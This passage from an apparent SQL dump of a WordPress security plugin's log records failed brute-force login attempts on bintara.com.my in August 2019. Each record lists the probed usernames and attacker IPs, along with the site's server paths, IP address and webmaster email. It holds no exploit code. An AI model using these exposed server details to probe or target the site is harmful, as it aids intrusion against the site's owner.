Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"134.209.173.8\";s:11:\"REMOTE_PORT\";s:5:\"57118\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTKr2XkG1atThADMYGjhQAAANY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566886576.053\";s:12:\"REQUEST_TIME\";s:10:\"1566886576\";}}','notice','2019-08-27 06:16:17','2019-08-27 06:16:16',17685648,19175888,'https://bintara.com.my/wp-login.php',1,0,'134.209.173.8'),(23381,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"134.209.173.8\";s:11:\"REMOTE_PORT\";s:5:\"57670\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTKs7dCvC5@KvzqwiFFCgAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566886579.8817\";s:12:\"REQUEST_TIME\";s:10:\"1566886579\";}}','notice','2019-08-27 06:16:21','2019-08-27 06:16:20',18200336,19500384,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.173.8'),(23382,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.14.115\";s:11:\"REMOTE_PORT\";s:5:\"45514\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTO02XkG1atThADMYGkuAAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566887635.5882\";s:12:\"REQUEST_TIME\";s:10:\"1566887635\";}}','notice','2019-08-27 06:33:58','2019-08-27 06:33:56',17683304,19174544,'https://bintara.com.my/wp-login.php',1,0,'139.59.14.115'),(23383,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.14.115\";s:11:\"REMOTE_PORT\";s:5:\"47212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTO2mXkG1atThADMYGkwQAAAMo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566887642.2708\";s:12:\"REQUEST_TIME\";s:10:\"1566887642\";}}','notice','2019-08-27 06:34:04','2019-08-27 06:34:02',18200264,19499040,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.14.115'),(23347,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"43.239.148.94\";s:11:\"REMOTE_PORT\";s:5:\"41926\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSLQg0@TGWC-1tzGX5qKgAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566870338.6943\";s:12:\"REQUEST_TIME\";s:10:\"1566870338\";}}','notice','2019-08-27 01:45:40','2019-08-27 01:45:39',17684568,19177336,'https://bintara.com.my/wp-login.php',1,0,'43.239.148.94'),(23346,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"180.235.234.129\";s:11:\"REMOTE_PORT\";s:5:\"36246\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSJCw0@TGWC-1tzGX5pggAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566869771.921\";s:12:\"REQUEST_TIME\";s:10:\"1566869771\";}}','notice','2019-08-27 01:36:13','2019-08-27 01:36:12',17685704,19177008,'https://bintara.com.my/wp-login.php',1,0,'180.235.234.129'),(23345,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.45.126.51\";s:11:\"REMOTE_PORT\";s:5:\"43380\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSG3R90bn5mtr-PXqrRNQAAAFA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566869213.9846\";s:12:\"REQUEST_TIME\";s:10:\"1566869213\";}}','notice','2019-08-27 01:26:55','2019-08-27 01:26:54',17683344,19174544,'https://bintara.com.my/wp-login.php',1,0,'5.45.126.51'),(23344,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"80.211.189.126\";s:11:\"REMOTE_PORT\";s:5:\"44143\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSEsx90bn5mtr-PXqrP6gAAAE4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566868659.6588\";s:12:\"REQUEST_TIME\";s:10:\"1566868659\";}}','notice','2019-08-27 01:17:41','2019-08-27 01:17:40',18201120,19498360,'https://bintara.com.my/xmlrpc.php',1,0,'80.211.189.126'),(23343,0,'brute_force','invalid-login::username-publisher18','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:11:\"publisher18\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"479\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.238.94.107\";s:11:\"REMOTE_PORT\";s:5:\"53908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSEpx90bn5mtr-PXqrP5QAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566868647.3863\";s:12:\"REQUEST_TIME\";s:10:\"1566868647\";}}','notice','2019-08-27 01:17:28','2019-08-27 01:17:27',18202824,19502184,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.94.107'),(23342,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 